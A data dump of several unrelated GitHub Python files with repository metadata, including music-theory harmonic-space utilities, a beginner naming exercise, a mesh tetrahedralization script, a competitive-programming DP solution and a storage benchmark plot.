len(points))\n\n if type == 'root':\n colors = np.where(are_roots(points), 1, colors)\n colors = [['black', 'red'][i] for i in colors]\n elif type == 'extremity':\n colors = np.where(are_extremities(points), 1, colors)\n colors = [['black', 'mediumseagreen'][i] for i in colors]\n elif type == 'root_extremity':\n colors = np.where(are_roots(points), 1, colors)\n colors = np.where(are_extremities(points), 2, colors)\n colors = [['black', 'red', 'mediumseagreen'][i] for i in colors]\n elif type == 'root_breakpoint':\n colors = np.where(are_roots(points), 1, colors)\n colors = np.where(are_root_breakpoints(points), 2, colors)\n colors = [['black', 'red', 'mediumorchid'][i] for i in colors]\n elif type == 'extremity_breakpoint':\n colors = np.where(are_extremities(points), 1, colors)\n colors = np.where(are_extremity_breakpoints(points), 2, colors)\n colors = [['black', 'mediumseagreen', 'cornflowerblue'][i] for i in colors]\n\n colors = [colors[i] for i in edge_order]\n\n pos=graphviz_layout(G, prog='dot')\n plt.figure(figsize=[3, 4])\n nx.draw(G, pos, with_labels=False, arrows=False, node_color=colors)\n plt.savefig(path + '.pdf', transparent=True)\n plt.close()\n\ndef plot_basic_hsl(points, path, type='root'):\n \"\"\"\n\n possible types: root, extremity, root_extremity, root_breakpoint,\n extremity_breakpoint,\"\"\"\n colors = np.repeat(0, len(points))\n if type == 'root':\n colors = np.where(are_roots(points), 1, colors)\n colors = [['black', 'red'][i] for i in colors]\n elif type == 'extremity':\n colors = np.where(are_extremities(points), 1, colors)\n colors = [['black', 'mediumseagreen'][i] for i in colors]\n elif type == 'root_extremity':\n colors = np.where(are_roots(points), 1, colors)\n colors = np.where(are_extremities(points), 2, colors)\n colors = [['black', 'red', 'mediumseagreen'][i] for i in colors]\n elif type == 'root_breakpoint':\n colors = np.where(are_roots(points), 1, colors)\n colors = np.where(are_root_breakpoints(points), 2, colors)\n colors = [['black', 'red', 'mediumorchid'][i] for i in colors]\n elif type == 'extremity_breakpoint':\n colors = np.where(are_extremities(points), 1, colors)\n colors = np.where(are_extremity_breakpoints(points), 2, colors)\n colors = [['black', 'mediumseagreen', 'cornflowerblue'][i] for i in colors]\n else: print('Error: Unknown Type')\n primes = np.array((3, 5, 7))\n make_plot(points, primes, path, dot_size=2, colors=colors,\n ratios=False, range_override=[-1, 3], connect_color='black',\n connect_size=1, legend=False, transparent=True)\n\ndef get_factors(nr):\n \"\"\"Enumerates all factors of a given number.\"\"\"\n i = 2\n factors = []\n while i <= nr:\n if (nr % i) == 0:\n factors.append(i)\n nr = nr / i\n else:\n i = i + 1\n return factors\n\ndef get_hsv(nr, num_of_primes = 8):\n \"\"\"For a given number, returns its harmonic space vector.\"\"\"\n primes = np.array((2, 3, 5, 7, 11, 13, 17, 19))[:num_of_primes]\n hsv = np.zeros_like(primes)\n factors = np.array(get_factors(nr))\n unique, exponents = np.unique(factors, return_counts=True)\n for i, item in enumerate(unique):\n index = np.where(primes == item)\n hsv[index] = exponents[i]\n return hsv\n\ndef analyze(ratios, root = 1):\n ratios = [Fraction(ratio).limit_denominator(1000) for ratio in ratios]\n full_hsvs = np.array([get_hsv(f.numerator) - get_hsv(f.denominator) for f in ratios])\n octave_generalized = full_hsvs[:, 1:]\n primes = np.array((3, 5, 7, 11, 13, 17, 19))\n filter = np.where(np.any(octave_generalized.T != np.zeros(len(ratios)), axis=1))\n chord_primes = primes[filter]\n hsvs = octave_generalized[:, filter]\n shape = np.shape(hsvs)\n hsvs = np.reshape(hsvs, (shape[0], shape[2]))\n octs = full_hsvs[:, 0]\n trials = cartesian_product(*[np.arange(-4, 5) for i in range(len(chord_primes))])\n b_trials = np.expand_dims(trials, 1)\n b_trials_shape = np.shape(b_trials)\n b_trials = np.broadcast_to(b_trials, (b_trials_shape[0], len(hsvs), b_trials_shape[-1]))\n sum = np.sum(b_trials * hsvs, axis=2)\n possible_trials = trials[np.all(sum == octs, axis=1)]\n if len(possible_trials) == 0:\n print('No Dice!')\n oct_shifts = 'Cant find good octave shifts'\n elif len(possible_trials) == 1:\n oct_shifts = possible_trials[0]\n elif len(possible_trials) > 1:\n oct_shifts = possible_trials[np.argmin(np.sum(np.abs(possible_trials), axis=1))]\n\n return chord_primes, hsvs, oct_shifts\n\n# clasifiers\n\ndef containment_size(points, return_containment_index=True):\n combs = [i for i in itertools.combinations(range(len(points)), 2)]\n ct = 0\n for comb in combs:\n p1 = points[comb[0]]\n p2 = points[comb[1]]\n if is_contained_by(p1, p2) or is_contained_by(p2, p1):\n ct += 1\n if return_containment_index == False:\n return ct\n else:\n return ct, ct / len([i for i in combs])\n\n\n\ndef get_routes(points):\n \"\"\"Return the number of routes in a chord.\"\"\"\n # intersections + extremities + loops - 1\n counts=[]\n for pt in points:\n dists = points-pt\n count = np.count_nonzero(np.linalg.norm(points-pt, axis=1) == 1)\n counts.append(count)\n counts = np.array(counts)\n intersections = np.count_nonzero(counts > 2)\n extremities = np.count_nonzero(counts == 1)\n loops = get_loops(points)\n return intersections + extremities + loops - 1\n\ndef mean_root_distance(points):\n roots = points[are_roots(points)]\n combined_dist = 0\n for root in roots:\n\n # dist = cdist(np.zeros_like(root), root, metric='cityblock')\n dist = np.sum(root)\n combined_dist += dist\n return combined_dist / len(roots)\n\ndef mean_root_angle(points):\n roots = points[are_roots(points)]\n combs = [i for i in itertools.combinations(range(len(roots)), 2)]\n angle_sum = 0\n for comb in combs:\n A = roots[comb[0]]\n B = roots[comb[1]]\n dot_product = np.dot(A, B)\n mag_product = np.linalg.norm(A) * np.linalg.norm(B)\n angle_sum += np.arccos(dot_product/ mag_product)\n if len(roots) == 1:\n return angle_sum\n else:\n return angle_sum * 2 * math.factorial(len(roots) - 2) / math.factorial(len(roots))\n\n\n\n# trajectory utils\n# ________________\n\ndef ult_vector(trajectory):\n \"\"\"('Ultimate Vector') Returns the vector from the origin to the destination of the\n trajectory.\"\"\"\n return np.sum(trajectory, axis=0)\n\ndef traj_to_points(traj, unique=True, persistence=False):\n \"\"\"Convert a trajectory to the set of unique points it crosses, were it to\n start at the origin.\"\"\"\n origin = np.zeros(np.shape(traj)[-1], dtype=int)\n points = np.expand_dims(origin, 0)\n for step in traj:\n new_point = np.array([points[-1] + step])\n points = np.concatenate((points, new_point))\n\n unq, cts = npi.unique(points, return_count=True)\n if persistence == True:\n if unique == True:\n return unq, cts / np.sum(cts)\n else:\n filter = npi.indices(unq, points)\n return points, cts[filter]\n else:\n if unique == True:\n return npi.unique(points)\n else:\n return points\n\ndef traj_to_point_tuples(traj, root = None, offset = 0.1):\n \"\"\"Returns an array of tuples of the start and endpoint of each traj vector,\n pasted end-to-front.\"\"\"\n if np.all(root == None):\n root = np.zeros(np.shape(traj)[-1])\n steps = []\n for i, step in enumerate(traj):\n if i == 0:\n start = root\n else:\n start = np.ceil(steps[-1][1])\n end = start + step * (1 - offset)\n steps.append((start, end))\n return steps\n\n\n\n\ndef cast_traj_to_ordinal(traj):\n \"\"\"Reorders the axes of the trajectory such that the chord it generates\n is in ordinal position, except for being translated due to the origin.\"\"\"\n points = traj_to_points(traj)\n sorts = get_ordinal_sorts(points)\n traj = traj[:, sorts[0]]\n traj = traj[:, sorts[1]]\n traj = traj[:, sorts[2]]\n return traj\n\ndef get_directionality(trajectory):\n \"\"\"Returns the proportion of steps that point in the same direction as the\n ultimate vector, summed along each axis.\"\"\"\n uv = ult_vector(trajectory)\n mult = uv * trajectory\n return np.sum(np.sign(mult)) / len(mult)\n\ndef get_crossings(trajectory, return_counts=True):\n \"\"\"Returns all points that are visited at least twice.\"\"\"\n points = traj_to_points(trajectory, unique=False)\n unq, cts = npi.unique(points, return_count=True)\n if return_counts == False:\n return unq[cts>1]\n else:\n return unq[cts>1], cts[cts>1]\n\n# def get_persistence(trajectory):\n# \"\"\"Returns proportion of all points relative to total non-unique points\n# crossed. Basically trying to measure how often each point is visited,\n# relative to the entirety of the trajectory.\"\"\"\n# points = traj_to_points(unique=False)\n# _, cts = npi.unique(points, return_count=True)\n\n\ndef traj_decomposition(traj, show_unq=True, show_proportion=True):\n \"\"\"Returns the list of ordered subsets of the original trajectory, and (if\n required) the list of unique subsets of the trajectory.\"\"\"\n traj_inds = [i for i in range(len(traj))]\n decomp_index = []\n for i, end in enumerate(range(1, len(traj))[::-1]):\n steps = i + 2\n for step in range(steps):\n decomp_index.append(np.array(traj_inds[step: step + end]))\n decomp = [traj[i] for i in decomp_index]\n unq = unq_traj_decomp(decomp)\n prop = len(unq) /len(decomp)\n if show_unq and show_proportion:\n return decomp, unq, prop\n elif show_unq:\n return decomp, unq\n elif show_proportion:\n return decomp, prop\n else:\n return decomp\n\ndef unq_traj_decomp(decomp):\n \"\"\"Takes a decomp (list of subsets of trajectory) and returns the list of\n unique sub-trajectories that have been cast to ordinal.\"\"\"\n ord = [cast_traj_to_ordinal(i) for i in decomp]\n lens = list(set([len(i) for i in ord]))\n sb_groups = [npi.unique(np.array([i for i in ord if len(i) == j])) for j in lens]\n out = [i for i in itertools.chain.from_iterable(sb_groups)]\n return out\n\n\nclass NpEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.integer):\n return int(obj)\n elif isinstance(obj, np.floating):\n return float(obj)\n elif isinstance(obj, np.ndarray):\n return obj.tolist()\n else:\n return super(NpEncoder, self).default(obj)\n\ndef tex_matrix_writer(matrix, path):\n out = '\\documentclass{article}\\n'\\\n '\\\\begin{document} $\\n'\\\n '\\\\left[\\n'\\\n '\\\\begin{array}'\n horiz = '|'.join(['c' for i in range(len(matrix))])\n out += '{' + horiz + '}\\n'\n for dim in range(np.shape(matrix)[-1]):\n out += ' & '.join([str(i) for i in matrix[:,dim]]) + ' \\\\\\\\\\n'\n out += '\\end{array}\\n'\\\n '\\\\right] $\\n'\\\n '\\end{document}'\n with open(path, 'w') as file:\n file.write(out)\n\n\ndef max_possible_roots(size, dims):\n \"\"\"Given the number of points in a collection and dimensions of harmonic\n space it occupies, returns the maximum possible number of roots (or,\n extremities), assuming dims is 2 or more.\"\"\"\n layers = math.floor(math.log(1 - size * (1 - dims), dims))\n roots = dims ** layers\n pts_left = size - (1 - roots) / (1 - dims)\n add = pts_left - int(np.ceil(pts_left / dims))\n roots += add\n return roots\n\ndef possible_paths(A, B):\n \"\"\"Given two points in the same dimensionality, where A contains B, return\n all of the possible paths from A to B (not including the endpoints).\"\"\"\n test = is_contained_by(B, A)\n if not test:\n print('error!!')\n diff = B - A\n moves = []\n for i, steps in enumerate(diff):\n for step in range(steps):\n moves.append(i)\n permutations = list(set(itertools.permutations(moves)))\n paths = []\n for perm in permutations:\n path = A.reshape((1, *np.shape(A)))\n for move in perm:\n next_point = path[-1] + np.eye(np.shape(A)[-1], dtype=int)[move]\n next_point = next_point.reshape((1, *np.shape(next_point)))\n path = np.concatenate((path, next_point))\n paths.append(path[1:-1])\n return paths\n\n\n# possible_paths(np.array((0, 0, 0)), np.array((2, 1, 0)))\n\ndef get_connected_indexes(points):\n # first, are they all connected? if so, connected_indexes will have one\n # list in it, containing all tones. If not, connected indexes will have\n # a seperate list for each subset of tones that are connected via adjacency.\n indexes = np.arange(len(points))\n connected_indexes = []\n outer_ct = 0\n out_size = 0\n while out_size < np.shape(points)[0]:\n accounted_for = list(itertools.chain.from_iterable(connected_indexes))\n not_yet_accounted_for = indexes[np.invert(np.isin(indexes, accounted_for))]\n connected_indexes.append([not_yet_accounted_for[0]])\n ct = 0\n while ct < len(connected_indexes[outer_ct]):\n pt = points[connected_indexes[outer_ct][ct]]\n adjacencies = np.nonzero(np.sum(np.abs(pt - points), axis=1) == 1)[0]\n add_adjacencies = [i for i in adjacencies if i not in connected_indexes[outer_ct]]\n if len(add_adjacencies) > 0:\n for aa in add_adjacencies:\n connected_indexes[outer_ct].append(aa)\n ct += 1\n outer_ct += 1\n out_size = len(list(i for i in itertools.chain.from_iterable(connected_indexes)))\n return connected_indexes\n\n\ndef least_common_containee(A, B):\n \"\"\"For points A and B, return the simplest (lowest manhattan distance from\n origin) point that both points contain.\"\"\"\n set = np.array((A, B))\n out = np.max(set, axis=0)\n return out\n\n# test = np.array(((1, 0), (0, 1)))\n# least_common_containee(*test)\n\ndef fix_collection(points):\n \"\"\"For a collection of tones, assess if it is a 'neighborhood'—-that all\n points are connected by adjacency. If so, return the points and an array\n filled with ones, indicating that its a normal 'chord'. If not, finds\n 'holes', adds them to the list of points, and returns an array with 1s for\n real tones, and 0s for 'holes', or 'ghost' tones.\"\"\"\n\n connected_indexes = get_connected_indexes(points)\n\n if len(connected_indexes) == 1:\n return points, np.zeros(len(points)) + 1\n else:\n # check each subset of tones against the other subsets for containments.\n # If there are containments, add all possible path points as potential\n # holes.\n combs = itertools.combinations(np.arange(len(connected_indexes)), 2)\n potential_holes = []\n for comb in combs:\n n_A = points[connected_indexes[comb[0]]]\n n_B = points[connected_indexes[comb[1]]]\n trials = cartesian_product(np.arange(len(n_A)), np.arange(len(n_B)))\n crs = [containment_relationship(n_A[t[0]], n_B[t[1]]) for t in trials]\n for i, cr in enumerate(crs):\n if cr != 0:\n if cr == 1:\n start = n_A[trials[i][0]]\n end = n_B[trials[i][1]]\n if cr == 2:\n start = n_B[trials[i][1]]\n end = n_A[trials[i][0]]\n pps = possible_paths(start, end)\n pps_ = np.concatenate(pps)\n if len(pps_) > 0:\n if len(potential_holes) == 0:\n potential_holes = pps_\n else:\n potential_holes = np.concatenate((potential_holes, pps_))\n unique, counts = npi.unique(potential_holes, return_count=True)\n sorted_unique = unique[np.argsort(counts)[::-1]]\n if len(sorted_unique) == 0:\n pot_holes = []\n else:\n pot_holes = sorted_unique[np.invert(npi.contains(points, sorted_unique))]\n\n # now try each 'pot_hole' (potential hole) to see if adding it to the\n # collection individually would bring all into one neighborhood. If none\n # can do alone, try every set of two, then every set of three, etc., all\n # the way up until you trying all pot holes altogether. If you can't\n # bring all together with the pot holes, bring together as many as\n # possible with as few as possible additions. From that point, you'll\n # have to find the simplest possible 'common hole' that would be contained\n # by the remaining sets ...\n pot_solutions = []\n for num_add_tones in range(1, len(pot_holes) + 1):\n if num_add_tones == 1:\n for i, ph in enumerate(pot_holes):\n add_set = np.concatenate((points, np.expand_dims(ph, 0)))\n ci = get_connected_indexes(add_set)\n pot_solutions.append((np.array(i), len(ci)))\n else:\n combs = itertools.combinations(range(len(pot_holes)), num_add_tones)\n for comb in combs:\n adds = pot_holes[np.array(comb)]\n add_set = np.concatenate((points, adds))\n ci = get_connected_indexes(add_set)\n pot_solutions.append((comb, len(ci)))\n sorts = np.argsort([ps[1] for ps in pot_solutions], kind='stable')\n if len(pot_solutions) > 0:\n if pot_solutions[sorts[0]][1] == 1:\n add = np.array(pot_solutions[sorts[0]][0])\n add_pts = pot_holes[add]\n if add_pts.ndim != points.ndim:\n add_pts = np.expand_dims(add_pts, 0)\n full_pts = np.concatenate((points, add_pts))\n ones = np.zeros(len(points), dtype=int) + 1\n if len(np.shape(add)) == 0:\n zeros = np.zeros(1, dtype=int)\n else:\n zeros = np.zeros(len(add), dtype=int)\n hole_array = np.concatenate((ones, zeros))\n return full_pts, hole_array\n else:\n add = np.array(pot_solutions[sorts[0]][0])\n add_pts = pot_holes[add]\n if add_pts.ndim == 1:\n add_pts = np.expand_dims(add_pts, 0)\n temp_full_pts = np.concatenate((points, add_pts))\n connected_indexes = get_connected_indexes(temp_full_pts)\n\n else:\n add_pts = []\n\n if 'temp_full_pts' not in locals():\n temp_full_pts = points\n\n combs = itertools.combinations(np.arange(len(connected_indexes)), 2)\n for comb in combs:\n lccs = []\n # print(points, connected_indexes, comb)\n n_A = temp_full_pts[connected_indexes[comb[0]]]\n n_B = temp_full_pts[connected_indexes[comb[1]]]\n trials = cartesian_product(np.arange(len(n_A)), np.arange(len(n_B)))\n for t in trials:\n lcc = least_common_containee(n_A[t[0]], n_B[t[1]])\n lccs.append(lcc)\n min_ind = np.argmin([np.sum(i) for i in lccs])\n A = n_A[trials[min_ind][0]]\n B = n_B[trials[min_ind][1]]\n lcc = lccs[min_ind]\n path_from_A = possible_paths(A, lcc)[0]\n path_from_B = possible_paths(B, lcc)[0]\n adds = np.concatenate((np.expand_dims(lcc, 0), path_from_A, path_from_B))\n if len(add_pts) == 0:\n add_pts = adds\n else:\n add_pts = np.concatenate((add_pts, adds))\n add_pts = npi.unique(add_pts)\n full_pts = np.concatenate((temp_full_pts, add_pts))\n ones = np.zeros(len(points), dtype=int) + 1\n zeros = np.zeros(len(full_pts) - len(points), dtype=int)\n hole_array = np.concatenate((ones, zeros))\n return full_pts, hole_array\n # currently doesn't work when there are three seperate groups, in second category,\n # and you only have to connect a to b and b to c; not also c to a\n\n\ndef get_layers(points):\n \"\"\"For a 3d collection of tones, splits the points into layers. Returns a\n list of lists of coordinates, one list for each layer.\"\"\"\n\n # first split into layers\n sums = np.sum(points, axis=1)\n max_layer = np.max(sums)\n layers = [points[sums==layer] for layer in range(max_layer+1)]\n return layers\n\ndef get_layer_skew(points):\n \"\"\"Given a 3d collection of tones, return a array of arrays, one for each\n layer, that describes the relative skew of that layer toward each dimension.\"\"\"\n layers = get_layers(points)\n skew=[]\n for i, layer in enumerate(layers):\n sk = np.sum(layer, axis=0)\n if np.sum(sk) != 0:\n sk = sk / np.sum(sk)\n skew.append(sk)\n return(np.array(skew))\n\n\ndef root_salience(points, scaled=True, indexes=False):\n \"\"\"Given a chord / neighborhood, return the roots, the number of tones\n that each root contains, and (if indexes==True), the indexes of each root.\n By default, the 'weight' of each root is scaled by dividing by the total\n number of non-root points.\"\"\"\n\n roots = points[are_roots(points)]\n non_roots = points[np.invert(are_roots(points))]\n weight = []\n for r in roots:\n ct = 0\n for nr in non_roots:\n if is_contained_by(nr, r):\n ct += 1\n weight.append(ct)\n if scaled:\n weight = [i/len(non_roots) for i in weight]\n if indexes:\n return roots, weight, np.nonzero(are_roots(points))[0]\n else:\n return roots, weight\n\n\ndef dc_alg_step(size, counts=None, alpha=1.0):\n \"\"\"Performs a single iteration of James Tenney's Dissonant Counterpoint\n Algorithm. Randomly chooses an index from range(size) with weights based on\n the previous 'counts'. The process starts off with counts all = 1. Each time\n an element is chosen, its count goes down to 1. Each time an element is not\n chosen, its count is incremented up by one.\n\n Parameters:\n size (integer): the number of elements to choose between.\n counts (array of ints >= 1): the counts of each element.\n alpha (float): the 'sharpness' of the weighting.\n\n \"\"\"\n if np.all(counts == None):\n counts = np.zeros(size, dtype=int) + 1\n\n weight = counts**alpha\n p = weight / np.sum(weight)\n choice_index = np.random.choice(np.arange(size), p=p)\n counts += 1\n counts[choice_index] = 1\n return choice_index, counts\n\n\ndef dc_alg(size, epochs, counts=None, alpha=1.0, return_counts=False):\n \"\"\"Iterates through multiple dc_alg_steps, returning the list of element\n indexes, and (if requested) the number of counts at the end.\n\n Parameters:\n size (integer): the number of elements to choose between.\n counts (array of ints >= 1): the counts of each element.\n alpha (float > 0.0): the 'sharpness' of the weighting.\n epochs (integer): the number of times to iterate through the dc_alg.\"\"\"\n\n choices = []\n for e in range(epochs):\n choice, counts = dc_alg_step(size, counts, alpha)\n choices.append(choice)\n choices = np.array(choices)\n if return_counts:\n return choices, counts\n else:\n return choices\n\n\ndef group_dc_alg_step(groups, group_counts=None, element_counts=None, alpha=1.0):\n \"\"\"dc_alg, but for groups of elements.\n\n Parameters:\n groups (array of nested arrays, each filled with ints)\n \"\"\"\n if np.all(group_counts == None):\n group_counts = np.zeros(len(groups), dtype=int) + 1\n if np.all(element_counts == None):\n element_counts = np.zeros(np.max(flatten(groups))+1, dtype=int) + 1\n\n # avg of element counts for each group\n group_avg_ec = []\n for group in groups:\n avg = np.mean([element_counts[i] for i in group])\n group_avg_ec.append(avg)\n group_avg_ec = np.array(group_avg_ec)\n weight = group_counts * group_avg_ec\n p = weight/ np.sum(weight)\n choice_index = np.random.choice(np.array(len(groups)), p=p)\n choice = groups[choice_index]\n group_counts += 1\n group_counts[choice_index] = 1\n element_counts += 1\n for i in choice:\n element_counts[i] = 1\n return choice_index, group_counts, element_counts\n\ndef group_dc_alg(groups, epochs, group_counts=None, element_counts=None,\n alpha=1.0, return_counts=False):\n cis = []\n gc = group_counts\n ec = element_counts\n for e in range(epochs):\n choice_index, gc, ec = group_dc_alg_step(groups, gc, ec, alpha)\n cis.append(choice_index)\n if return_counts:\n return [groups[i] for i in cis], gc, ec\n else:\n return [groups[i] for i in cis]\n\n\n# def group_member_dc_alg_step(groups, )\n\ndef make_random_trajectory(length, max_step=1, dims=3, circular=True):\n \"\"\"\n\n parameters:\n length (integer, if circular==True, must be even)\n\n \"\"\"\n steps = np.zeros((length, dims), dtype=int)\n indexes = np.random.randint(dims, size=length)\n steps[np.arange(length), indexes] = np.random.randint(-1, 2, size=length)\n if circular == True:\n mirror = -1 * steps[:int(length/2)]\n np.random.shuffle(mirror)\n steps[int(length/2):] = mirror\n return steps\n\n\ndef traj_to_absolute(traj):\n origin = np.zeros(shape=(1, np.shape(traj)[-1]), dtype=int)\n return np.concatenate(((origin), np.cumsum(traj, axis=0)))\n\n\ndef hsv_to_freq(hsv, primes, fund, oct=(0, 0, 0)):\n oct = np.array(oct)\n if len(np.shape(hsv)) == 2:\n # print(hsv)\n sub_prod = (primes ** hsv) * (2.0 ** (hsv * oct))\n freq = fund * np.prod(sub_prod, axis=1)\n elif len(np.shape(hsv)) == 3:\n sub_prod = (primes ** hsv) * (2.0 ** (hsv * oct))\n freq = fund * np.prod(sub_prod, axis=2)\n\n else:\n freq = fund * np.prod((primes ** hsv) * (2.0 ** (hsv * oct)))\n return freq\n\ndef hsv_to_gen_ratios(hsv, primes):\n \"\"\"For a list of tones specified as harmonic series vectors, return the\n associated octave-generalized ratios.\"\"\"\n out = np.prod(primes ** hsv, axis=1)\n while np.any(out < 1) or np.any(out >= 2):\n out = np.where(out < 1, out * 2, out)\n out = np.where(out >=2, out / 2, out)\n return out\n\n\n\ndef octave_finder(chord, fund, primes, lims=(50, 50*(2**5)), max_width=False):\n \"\"\"Returns all of the possible octave shifts that would make the notes in\n the chord audible.\"\"\"\n bit = np.arange(-4, 4)\n cp = cartesian_product(*(bit for i in range(np.shape(chord)[-1])))\n seive = np.zeros(len(cp), dtype=bool)\n freq_ranges=[]\n for i, oct in enumerate(cp):\n freq = hsv_to_freq(chord, primes, fund, oct)\n min_freq = np.min(freq)\n max_freq = np.max(freq)\n freq_ranges.append(max_freq - min_freq)\n if np.all(min_freq >= lims[0]) and np.all(max_freq <= lims[1]):\n seive[i] = True\n possible_octs = cp[seive]\n freq_ranges = np.array(freq_ranges)\n freq_ranges = freq_ranges[seive]\n if max_width:\n return possible_octs, freq_ranges\n else:\n return possible_octs\n\n# timbre tools\n\ndef fill_in_octaves(freqs, max_freq=None, as_harms=False):\n \"\"\"For an array of frequencies, return an array will the original array plus\n all octave multiples of each that are less than the maximum frequency.\"\"\"\n if max_freq == None:\n max_freq = np.max(freqs)\n out = []\n for freq in freqs:\n ct = 0\n while freq * (2 ** ct) <= max_freq:\n out.append(freq * (2 ** ct))\n ct += 1\n out = np.array(out)\n if as_harms:\n partials = np.arange(1, max_freq + 1)\n truth = npi.contains(out, partials)\n return truth.astype(int)\n else:\n return out\n","repo_name":"jon-myers/Harmonic_Theory","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":56499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"9592621921","text":"f_name = \"Pontius\"\nl_name = \"Pilate\"\n\n# Logic\nfull_name = f_name + \" \" + l_name\n\n# define the function\ndef get_full_name(first_name: str, last_name: str) -> str:\n full_name = first_name + \" \" + last_name\n return full_name\n\n\ndef print_name(name: str) -> None:\n with open(\"names.txt\", \"a\") as file:\n file.write(name + \"\\n\")\n print(name)\n\n\nprint(full_name)\nprint(\"================================\")\n\n# usage of the function\nresult = get_full_name(\"Joe\", \"Mafia\")\nprint_name(result)\n","repo_name":"neotechmonk/py-face","sub_path":"goog_crash_course/w2_expressions.py","file_name":"w2_expressions.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"5201304439","text":"#!/usr/bin/env python3\n\nimport sys, os, pathlib\nsys.path.append(str(pathlib.Path.home().joinpath('bin')))\nsys.path.append(os.getcwd())\n\nimport py11igl as igl\nimport argparse\nimport numpy as np\n\ndef main():\n p = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n p.add_argument('file', help='Files to tet')\n p.add_argument('-o', help='output npz file', required=True)\n p.add_argument('--scale', help='Scale applied to the mesh', default=1.0, type=float)\n args = p.parse_args()\n\n inV, inF = igl.loadOBJ(args.file)\n V, T, F = igl.tet(inV, inF, 1.0)\n np.savez(args.o, V=V, T=T, F=F)\n\nif __name__ == '__main__':\n main()\n","repo_name":"xinyazhang/igl_utils","sub_path":"python/tetobj.py","file_name":"tetobj.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"16589295628","text":"import sys\nfrom io import StringIO\nimport unittest\n\nclass TestClass(unittest.TestCase):\n maxDiff = None\n def assertIO(self, input, output):\n stdout, stdin = sys.stdout, sys.stdin\n sys.stdout, sys.stdin = StringIO(), StringIO(input)\n resolve()\n sys.stdout.seek(0)\n out = sys.stdout.read()[:-1]\n sys.stdout, sys.stdin = stdout, stdin\n self.assertEqual(out, output)\n\n def test_Sample_Input_1(self):\n input = \"\"\"3 4 2\n1 7 7 9\n9 6 3 7\n7 8 6 4\"\"\"\n output = \"\"\"10\"\"\"\n self.assertIO(input, output)\n\n def test_Sample_Input_2(self):\n input = \"\"\"3 3 1000000000\n1000000 1000000 1\n1000000 1000000 1000000\n1 1000000 1000000\"\"\"\n output = \"\"\"1001000001\"\"\"\n self.assertIO(input, output)\n\ndef resolve():\n # (i, j) を終点だとすると、上から遷移してくる場合と左から遷移してくる場合しかない。\n # 終点は駅があっても線路を引くと考える。\n # 上と左が線路の時と始点の時で考えることが異なる。\n # 遷移してきた場所が始点の場合、A[i-1][j] か A[i][j-1] + C が (i, j) まで線路を引くコストになる。\n # 遷移してきた場所が線路の場合、そこまでのコストの最小値 + C が (i, j) まで線路を引くコストになる。\n # dp[i][j] = dp[i-1][j] or dp[i][j-1] から遷移してきたときの最小コストを解く\n # ↑ だと左上から右下への遷移しかわからないので困る。\n # 上下反転して同じことをする。\n inf = 10**30+1\n H, W, C = map(int, input().split(\" \"))\n A = [[int(x) for x in input().split(\" \")]+[inf] for _ in range(H)]+[[inf]*(W+1)]\n dp = [[0]*W+[inf] for _ in range(H)]+[[inf]*(W+1)]\n dp[0][0] = A[0][0]\n ans = inf\n for h in range(H):\n for w in range(W):\n if h == 0 and w == 0: continue\n dp[h][w] = min(A[h-1][w], dp[h-1][w], A[h][w-1], dp[h][w-1])+C\n ans = min(ans, dp[h][w]+A[h][w])\n\n # 上下反転\n dp = [[0]*W+[inf] for _ in range(H)]+[[inf]*(W+1)]\n dp[H-1][0] = A[H-1][0]\n for h in reversed(range(H)):\n for w in range(W):\n if h == H-1 and w == 0: continue\n dp[h][w] = min(A[h+1][w], dp[h+1][w], A[h][w-1], dp[h][w-1])+C\n ans = min(ans, dp[h][w]+A[h][w])\n print(ans)\n\nimport sys\nif sys.argv[-1] == './Main.py':\n resolve()\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"TsukasaDEKA/competitive_programing","sub_path":"atcoder/current/ABC/201_300/210/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"32463025982","text":"\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\n\n# _w = write iops\n# _r = read iops\n\n\nx = np.arange(1,8)\nx_labels=[\"1\", \"2\", \"4\", \"8\", \"16\", \"32\", \"64\"]\n#pod\ny1_r=[979, 1893, 3030, 4078, 5129, 6063, 7022 ]\ny1_w=[418, 809, 1299, 1749, 2199, 2600, 3011 ]\n\n\n#host\n\n#y2_w=[2884,2727,2541,1468,761]\n#y2_r=[6724,6367,5886,3437,1761]\ny2_r=[951, 1843, 3034, 4170, 5203, 6129, 6915]\ny2_w=[406, 789, 1301, 1788, 2231, 2628, 2965]\n\n\n#plt.plot(x, y2_r, 'r-', x, y2_w, 'b-' )\n\nplt.bar(x-0.125, y2_w, color='r', width = 0.25)\nplt.bar(x+0.125, y1_w, color='b', width = 0.25)\n\nplt.title(\"Fio Test on RBD: IOdepth vs Write IOPS\")\nplt.ylabel('Write IOPS')\nplt.xlabel('Rammp time')\nplt.xticks(x, x_labels)\n\nred_patch = mpatches.Patch(color='red', label='Host')\nblue_patch = mpatches.Patch(color='blue', label='Pod')\nplt.legend(handles=[red_patch,blue_patch])\n\n\nplt.savefig('rbd_depth_write')\nplt.show()\n\nplt.bar(x-0.125, y2_r, color='r', width = 0.25)\nplt.bar(x+0.125, y1_r, color='b', width = 0.25)\n\nplt.title(\"Fio Test on RBD: IOdepth vs Read IOPS \")\nplt.ylabel('Read IOPS')\nplt.xlabel('Ramp time')\nplt.xticks(x, x_labels)\n\nred_patch = mpatches.Patch(color='red', label='Host')\nblue_patch = mpatches.Patch(color='blue', label='Pod')\nplt.legend(handles=[red_patch,blue_patch])\n\n\nplt.savefig('rbd_depth_read')\nplt.show()\n\n","repo_name":"gemoya/memoria_exp","sub_path":"plot/rbd_depth.py","file_name":"rbd_depth.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"31474488643","text":"from __future__ import print_function\nimport keras\nfrom keras.layers import Dense, Conv2D, BatchNormalization, Activation\nfrom keras.layers 